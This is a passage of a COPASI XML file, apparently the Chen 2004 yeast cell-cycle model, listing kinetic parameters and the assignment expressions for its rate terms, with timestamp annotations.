<ModelValue key="ModelValue_119" name="kppnet'" simulationType="fixed">
</ModelValue>
<ModelValue key="ModelValue_120" name="kppnet''" simulationType="fixed">
</ModelValue>
<ModelValue key="ModelValue_121" name="ks14" simulationType="fixed">
</ModelValue>
<ModelValue key="ModelValue_122" name="ks1pds''" simulationType="fixed">
</ModelValue>
<ModelValue key="ModelValue_123" name="ks20'" simulationType="fixed">
</ModelValue>
<ModelValue key="ModelValue_124" name="ks20''" simulationType="fixed">
</ModelValue>
<ModelValue key="ModelValue_125" name="ks2pds''" simulationType="fixed">
</ModelValue>
<ModelValue key="ModelValue_126" name="ksb2'" simulationType="fixed">
</ModelValue>
<ModelValue key="ModelValue_127" name="ksb2''" simulationType="fixed">
</ModelValue>
<ModelValue key="ModelValue_128" name="ksb5'" simulationType="fixed">
</ModelValue>
<ModelValue key="ModelValue_129" name="ksb5''" simulationType="fixed">
</ModelValue>
<ModelValue key="ModelValue_130" name="ksbud" simulationType="fixed">
</ModelValue>
<ModelValue key="ModelValue_131" name="ksc1'" simulationType="fixed">
</ModelValue>
<ModelValue key="ModelValue_132" name="ksc1''" simulationType="fixed">
</ModelValue>
<ModelValue key="ModelValue_133" name="kscdh" simulationType="fixed">
</ModelValue>
<ModelValue key="ModelValue_134" name="ksf6'" simulationType="fixed">
</ModelValue>
<ModelValue key="ModelValue_135" name="ksf6''" simulationType="fixed">
<MiriamAnnotation>
<rdf:RDF xmlns:dcterms="http://purl.org/dc/terms/" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#ModelValue_135">
<dcterms:created>
<rdf:Description>
<dcterms:W3CDTF>2010-08-05T15:30:47Z</dcterms:W3CDTF>
</rdf:Description>
</dcterms:created>
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
</ModelValue>
<ModelValue key="ModelValue_136" name="ksf6'''" simulationType="fixed">
</ModelValue>
<ModelValue key="ModelValue_137" name="ksn2'" simulationType="fixed">
<MiriamAnnotation>
<rdf:RDF xmlns:dcterms="http://purl.org/dc/terms/" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#ModelValue_137">
<dcterms:created>
<rdf:Description>
<dcterms:W3CDTF>2010-08-05T15:57:20Z</dcterms:W3CDTF>
</rdf:Description>
</dcterms:created>
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
</ModelValue>
<ModelValue key="ModelValue_138" name="ksn2''" simulationType="fixed">
</ModelValue>
<ModelValue key="ModelValue_139" name="ksnet" simulationType="fixed">
<MiriamAnnotation>
<rdf:RDF xmlns:dcterms="http://purl.org/dc/terms/" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#ModelValue_139">
<dcterms:created>
<rdf:Description>
<dcterms:W3CDTF>2010-08-05T15:30:47Z</dcterms:W3CDTF>
</rdf:Description>
</dcterms:created>
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
</ModelValue>
<ModelValue key="ModelValue_140" name="ksori" simulationType="fixed">
<MiriamAnnotation>
<rdf:RDF xmlns:dcterms="http://purl.org/dc/terms/" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#ModelValue_140">
<dcterms:created>
<rdf:Description>
<dcterms:W3CDTF>2010-08-05T15:27:23Z</dcterms:W3CDTF>
</rdf:Description>
</dcterms:created>
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
</ModelValue>
<ModelValue key="ModelValue_141" name="kspds'" simulationType="fixed">
<MiriamAnnotation>
<rdf:RDF xmlns:dcterms="http://purl.org/dc/terms/" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#ModelValue_141">
<dcterms:created>
<rdf:Description>
<dcterms:W3CDTF>2010-08-05T10:53:35Z</dcterms:W3CDTF>
</rdf:Description>
</dcterms:created>
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
</ModelValue>
<ModelValue key="ModelValue_142" name="ksppx" simulationType="fixed">
<MiriamAnnotation>
<rdf:RDF xmlns:dcterms="http://purl.org/dc/terms/" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#ModelValue_142">
<dcterms:created>
<rdf:Description>
<dcterms:W3CDTF>2010-08-05T10:53:35Z</dcterms:W3CDTF>
</rdf:Description>
</dcterms:created>
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
</ModelValue>
<ModelValue key="ModelValue_143" name="ksspn" simulationType="fixed">
<MiriamAnnotation>
<rdf:RDF xmlns:dcterms="http://purl.org/dc/terms/" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#ModelValue_143">
<dcterms:created>
<rdf:Description>
<dcterms:W3CDTF>2010-08-05T10:53:34Z</dcterms:W3CDTF>
</rdf:Description>
</dcterms:created>
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
</ModelValue>
<ModelValue key="ModelValue_144" name="ksswi'" simulationType="fixed">
<MiriamAnnotation>
<rdf:RDF xmlns:dcterms="http://purl.org/dc/terms/" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#ModelValue_144">
<dcterms:created>
<rdf:Description>
<dcterms:W3CDTF>2010-08-05T10:53:34Z</dcterms:W3CDTF>
</rdf:Description>
</dcterms:created>
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
</ModelValue>
<ModelValue key="ModelValue_145" name="ksswi''" simulationType="fixed">
<MiriamAnnotation>
<rdf:RDF xmlns:dcterms="http://purl.org/dc/terms/" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#ModelValue_145">
<dcterms:created>
<rdf:Description>
<dcterms:W3CDTF>2010-08-05T10:53:33Z</dcterms:W3CDTF>
</rdf:Description>
</dcterms:created>
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
</ModelValue>
<ModelValue key="ModelValue_146" name="lte1h" simulationType="fixed">
<MiriamAnnotation>
<rdf:RDF xmlns:dcterms="http://purl.org/dc/terms/" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#ModelValue_146">
<dcterms:created>
<rdf:Description>
<dcterms:W3CDTF>2010-08-05T10:53:32Z</dcterms:W3CDTF>
</rdf:Description>
</dcterms:created>
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
</ModelValue>
<ModelValue key="ModelValue_147" name="lte1l" simulationType="fixed">
<MiriamAnnotation>
<rdf:RDF xmlns:dcterms="http://purl.org/dc/terms/" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#ModelValue_147">
<dcterms:created>
<rdf:Description>
<dcterms:W3CDTF>2010-03-16T13:31:54Z</dcterms:W3CDTF>
</rdf:Description>
</dcterms:created>
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
</ModelValue>
<ModelValue key="ModelValue_148" name="mad2h" simulationType="fixed">
<MiriamAnnotation>
<rdf:RDF xmlns:dcterms="http://purl.org/dc/terms/" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#ModelValue_148">
<dcterms:created>
<rdf:Description>
<dcterms:W3CDTF>2010-08-05T10:53:31Z</dcterms:W3CDTF>
</rdf:Description>
</dcterms:created>
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
</ModelValue>
<ModelValue key="ModelValue_149" name="mad2l" simulationType="fixed">
<MiriamAnnotation>
<rdf:RDF xmlns:dcterms="http://purl.org/dc/terms/" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#ModelValue_149">
<dcterms:created>
<rdf:Description>
<dcterms:W3CDTF>2010-08-05T10:53:30Z</dcterms:W3CDTF>
</rdf:Description>
</dcterms:created>
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
</ModelValue>
<ModelValue key="ModelValue_150" name="mdt" simulationType="assignment">
<MiriamAnnotation>
<rdf:RDF xmlns:dcterms="http://purl.org/dc/terms/" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#ModelValue_150">
<dcterms:created>
<rdf:Description>
<dcterms:W3CDTF>2010-03-16T15:51:23Z</dcterms:W3CDTF>
</rdf:Description>
</dcterms:created>
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
<Expression>
log(2)/<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[mu],Reference=Value>
</Expression>
</ModelValue>
<ModelValue key="ModelValue_151" name="TEM1T" simulationType="fixed">
<MiriamAnnotation>
<rdf:RDF xmlns:dcterms="http://purl.org/dc/terms/" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#ModelValue_151">
<dcterms:created>
<rdf:Description>
<dcterms:W3CDTF>2010-08-05T15:28:57Z</dcterms:W3CDTF>
</rdf:Description>
</dcterms:created>
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
</ModelValue>
<ModelValue key="ModelValue_152" name="D" simulationType="assignment">
<MiriamAnnotation>
<rdf:RDF xmlns:dcterms="http://purl.org/dc/terms/" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#ModelValue_152">
<dcterms:created>
<rdf:Description>
<dcterms:W3CDTF>2010-03-16T15:50:29Z</dcterms:W3CDTF>
</rdf:Description>
</dcterms:created>
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
<Expression>
1.026/<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[mu],Reference=Value>-32
</Expression>
</ModelValue>
<ModelValue key="ModelValue_153" name="mu" simulationType="assignment">
<MiriamAnnotation>
<rdf:RDF xmlns:dcterms="http://purl.org/dc/terms/" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#ModelValue_153">
<dcterms:created>
<rdf:Description>
<dcterms:W3CDTF>2010-03-16T15:50:43Z</dcterms:W3CDTF>
</rdf:Description>
</dcterms:created>
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
<Expression>
<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[mu2],Reference=Value>*<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Compartments[cell],Vector=Metabolites[GLU],Reference=Concentration>/(<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[KmGLU],Reference=Value>+<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Compartments[cell],Vector=Metabolites[GLU],Reference=Concentration>)
</Expression>
</ModelValue>
<ModelValue key="ModelValue_154" name="Vdb5" simulationType="assignment">
<MiriamAnnotation>
<rdf:RDF xmlns:dcterms="http://purl.org/dc/terms/" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#ModelValue_154">
<dcterms:created>
<rdf:Description>
<dcterms:W3CDTF>2010-08-05T15:29:27Z</dcterms:W3CDTF>
</rdf:Description>
</dcterms:created>
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
<Expression>
<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[kdb5'],Reference=Value>+<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[kdb5''],Reference=Value>*(<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Compartments[cell],Vector=Metabolites[CDC20],Reference=ParticleNumber>/<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[amount to particle factor],Reference=Value>)
</Expression>
</ModelValue>
<ModelValue key="ModelValue_155" name="Vdb2" simulationType="assignment">
<MiriamAnnotation>
<rdf:RDF xmlns:dcterms="http://purl.org/dc/terms/" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#ModelValue_155">
<dcterms:created>
<rdf:Description>
<dcterms:W3CDTF>2010-08-05T15:29:26Z</dcterms:W3CDTF>
</rdf:Description>
</dcterms:created>
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
<Expression>
<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[kdb2'],Reference=Value>+<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[kdb2''],Reference=Value>*(<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Compartments[cell],Vector=Metabolites[CDH1],Reference=ParticleNumber>/<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[amount to particle factor],Reference=Value>)+<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[kdb2p],Reference=Value>*(<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Compartments[cell],Vector=Metabolites[CDC20],Reference=ParticleNumber>/<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[amount to particle factor],Reference=Value>)
</Expression>
</ModelValue>
<ModelValue key="ModelValue_156" name="Vasbf" simulationType="assignment">
<MiriamAnnotation>
<rdf:RDF xmlns:dcterms="http://purl.org/dc/terms/" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#ModelValue_156">
<dcterms:created>
<rdf:Description>
<dcterms:W3CDTF>2010-08-05T15:29:05Z</dcterms:W3CDTF>
</rdf:Description>
</dcterms:created>
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
<Expression>
<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[kasbf],Reference=Value>*(<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[esbfn2],Reference=Value>*(<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Compartments[cell],Vector=Metabolites[CLN2],Reference=ParticleNumber>/<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[amount to particle factor],Reference=Value>)+<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[esbfn3],Reference=Value>*(<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Compartments[cell],Vector=Metabolites[CLN3],Reference=ParticleNumber>/<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[amount to particle factor],Reference=Value>+<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Compartments[cell],Vector=Metabolites[BCK2],Reference=ParticleNumber>/<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[amount to particle factor],Reference=Value>)+<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[esbfb5],Reference=Value>*(<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Compartments[cell],Vector=Metabolites[CLB5],Reference=ParticleNumber>/<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[amount to particle factor],Reference=Value>))
</Expression>
</ModelValue>
<ModelValue key="ModelValue_157" name="Visbf" simulationType="assignment">
<MiriamAnnotation>
<rdf:RDF xmlns:dcterms="http://purl.org/dc/terms/" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#ModelValue_157">
<dcterms:created>
<rdf:Description>
<dcterms:W3CDTF>2010-08-05T15:29:41Z</dcterms:W3CDTF>
</rdf:Description>
</dcterms:created>
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
<Expression>
<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[kisbf'],Reference=Value>+<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[kisbf''],Reference=Value>*(<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Compartments[cell],Vector=Metabolites[CLB2],Reference=ParticleNumber>/<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[amount to particle factor],Reference=Value>)
</Expression>
</ModelValue>
<ModelValue key="ModelValue_158" name="Vkpc1" simulationType="assignment">
<MiriamAnnotation>
<rdf:RDF xmlns:dcterms="http://purl.org/dc/terms/" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#ModelValue_158">
<dcterms:created>
<rdf:Description>
<dcterms:W3CDTF>2010-08-05T15:29:42Z</dcterms:W3CDTF>
</rdf:Description>
</dcterms:created>
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
<Expression>
<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[kd1c1],Reference=Value>+<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[Vd2c1],Reference=Value>/(<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[Jd2c1],Reference=Value>+<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Compartments[cell],Vector=Metabolites[SIC1],Reference=ParticleNumber>/<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[amount to particle factor],Reference=Value>+<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Compartments[cell],Vector=Metabolites[C2],Reference=ParticleNumber>/<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[amount to particle factor],Reference=Value>+<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Compartments[cell],Vector=Metabolites[C5],Reference=ParticleNumber>/<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[amount to particle factor],Reference=Value>+<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Compartments[cell],Vector=Metabolites[SIC1P],Reference=ParticleNumber>/<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[amount to particle factor],Reference=Value>+<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Compartments[cell],Vector=Metabolites[C2P],Reference=ParticleNumber>/<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[amount to particle factor],Reference=Value>+<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Compartments[cell],Vector=Metabolites[C5P],Reference=ParticleNumber>/<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[amount to particle factor],Reference=Value>)
</Expression>
</ModelValue>
<ModelValue key="ModelValue_159" name="Vkpf6" simulationType="assignment">
<MiriamAnnotation>
<rdf:RDF xmlns:dcterms="http://purl.org/dc/terms/" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#ModelValue_159">
<dcterms:created>
<rdf:Description>
<dcterms:W3CDTF>2010-08-05T15:29:44Z</dcterms:W3CDTF>
</rdf:Description>
</dcterms:created>
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
<Expression>
<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[kd1f6],Reference=Value>+<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[Vd2f6],Reference=Value>/(<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[Jd2f6],Reference=Value>+<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Compartments[cell],Vector=Metabolites[CDC6],Reference=ParticleNumber>/<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[amount to particle factor],Reference=Value>+<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Compartments[cell],Vector=Metabolites[F2],Reference=ParticleNumber>/<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[amount to particle factor],Reference=Value>+<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Compartments[cell],Vector=Metabolites[F5],Reference=ParticleNumber>/<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[amount to particle factor],Reference=Value>+<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Compartments[cell],Vector=Metabolites[CDC6P],Reference=ParticleNumber>/<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[amount to particle factor],Reference=Value>+<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Compartments[cell],Vector=Metabolites[F2P],Reference=ParticleNumber>/<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[amount to particle factor],Reference=Value>+<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Compartments[cell],Vector=Metabolites[F5P],Reference=ParticleNumber>/<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[amount to particle factor],Reference=Value>)
</Expression>
</ModelValue>
<ModelValue key="ModelValue_160" name="Vacdh" simulationType="assignment">
<MiriamAnnotation>
<rdf:RDF xmlns:dcterms="http://purl.org/dc/terms/" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#ModelValue_160">
<dcterms:created>
<rdf:Description>
<dcterms:W3CDTF>2010-08-05T15:28:58Z</dcterms:W3CDTF>
</rdf:Description>
</dcterms:created>
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
<Expression>
<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[kacdh'],Reference=Value>+<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[kacdh''],Reference=Value>*(<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Compartments[cell],Vector=Metabolites[CDC14],Reference=ParticleNumber>/<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[amount to particle factor],Reference=Value>)
</Expression>
</ModelValue>
<ModelValue key="ModelValue_161" name="Vicdh" simulationType="assignment">
<MiriamAnnotation>
<rdf:RDF xmlns:dcterms="http://purl.org/dc/terms/" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#ModelValue_161">
<dcterms:created>
<rdf:Description>
<dcterms:W3CDTF>2010-08-05T15:29:40Z</dcterms:W3CDTF>
</rdf:Description>
</dcterms:created>
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
<Expression>
<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[kicdh'],Reference=Value>+<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[kicdh''],Reference=Value>*(<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[eicdhn3],Reference=Value>*(<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Compartments[cell],Vector=Metabolites[CLN3],Reference=ParticleNumber>/<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[amount to particle factor],Reference=Value>)+<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[eicdhn2],Reference=Value>*(<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Compartments[cell],Vector=Metabolites[CLN2],Reference=ParticleNumber>/<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[amount to particle factor],Reference=Value>)+<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[eicdhb5],Reference=Value>*(<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Compartments[cell],Vector=Metabolites[CLB5],Reference=ParticleNumber>/<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[amount to particle factor],Reference=Value>)+<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[eicdhb2],Reference=Value>*(<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Compartments[cell],Vector=Metabolites[CLB2],Reference=ParticleNumber>/<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[amount to particle factor],Reference=Value>))
</Expression>
</ModelValue>
<ModelValue key="ModelValue_162" name="Vppnet" simulationType="assignment">
<MiriamAnnotation>
<rdf:RDF xmlns:dcterms="http://purl.org/dc/terms/" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#ModelValue_162">
<dcterms:created>
<rdf:Description>
<dcterms:W3CDTF>2010-08-05T15:29:59Z</dcterms:W3CDTF>
</rdf:Description>
</dcterms:created>
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
<Expression>
<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[kppnet'],Reference=Value>+<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[kppnet''],Reference=Value>*(<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Compartments[cell],Vector=Metabolites[PPX],Reference=ParticleNumber>/<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[amount to particle factor],Reference=Value>)
</Expression>
</ModelValue>
<ModelValue key="ModelValue_163" name="Vkpnet" simulationType="assignment">
<MiriamAnnotation>
<rdf:RDF xmlns:dcterms="http://purl.org/dc/terms/" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#ModelValue_163">
<dcterms:created>
<rdf:Description>
<dcterms:W3CDTF>2010-08-05T15:29:45Z</dcterms:W3CDTF>
</rdf:Description>
</dcterms:created>
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
<Expression>
(<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[kkpnet'],Reference=Value>+<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[kkpnet''],Reference=Value>*(<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Compartments[cell],Vector=Metabolites[CDC15],Reference=ParticleNumber>/<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[amount to particle factor],Reference=Value>))*(<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Compartments[cell],Vector=Metabolites[MASS],Reference=ParticleNumber>/<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[amount to particle factor],Reference=Value>)
</Expression>
</ModelValue>
<ModelValue key="ModelValue_164" name="Vdppx" simulationType="assignment">
<MiriamAnnotation>
<rdf:RDF xmlns:dcterms="http://purl.org/dc/terms/" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#ModelValue_164">
<dcterms:created>
<rdf:Description>
<dcterms:W3CDTF>2010-08-05T15:29:31Z</dcterms:W3CDTF>
</rdf:Description>
</dcterms:created>
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
<Expression>
<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[kdppx'],Reference=Value>+<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[kdppx''],Reference=Value>*(<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[J20ppx],Reference=Value>+<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Compartments[cell],Vector=Metabolites[CDC20],Reference=ParticleNumber>/<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[amount to particle factor],Reference=Value>)*<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[Jpds],Reference=Value>/(<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[Jpds],Reference=Value>+<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Compartments[cell],Vector=Metabolites[PDS1],Reference=ParticleNumber>/<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[amount to particle factor],Reference=Value>)
</Expression>
</ModelValue>
<ModelValue key="ModelValue_165" name="Vdpds" simulationType="assignment">
<MiriamAnnotation>
<rdf:RDF xmlns:dcterms="http://purl.org/dc/terms/" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#ModelValue_165">
<dcterms:created>
<rdf:Description>
<dcterms:W3CDTF>2010-08-05T15:29:28Z</dcterms:W3CDTF>
</rdf:Description>
</dcterms:created>
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
<Expression>
<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[kd1pds'],Reference=Value>+<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[kd2pds''],Reference=Value>*(<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Compartments[cell],Vector=Metabolites[CDC20],Reference=ParticleNumber>/<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[amount to particle factor],Reference=Value>)+<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[kd3pds''],Reference=Value>*(<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Compartments[cell],Vector=Metabolites[CDH1],Reference=ParticleNumber>/<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[amount to particle factor],Reference=Value>)
</Expression>
</ModelValue>
<ModelValue key="ModelValue_166" name="Vaiep" simulationType="assignment">
<MiriamAnnotation>
<rdf:RDF xmlns:dcterms="http://purl.org/dc/terms/" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#ModelValue_166">
<dcterms:created>
<rdf:Description>
<dcterms:W3CDTF>2010-08-05T15:29:03Z</dcterms:W3CDTF>
</rdf:Description>
</dcterms:created>
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
<Expression>
<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[kaiep],Reference=Value>*(<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Compartments[cell],Vector=Metabolites[CLB2],Reference=ParticleNumber>/<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[amount to particle factor],Reference=Value>)
</Expression>
</ModelValue>
<ModelValue key="ModelValue_167" name="Vd2c1" simulationType="assignment">
<MiriamAnnotation>
<rdf:RDF xmlns:dcterms="http://purl.org/dc/terms/" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#ModelValue_167">
<dcterms:created>
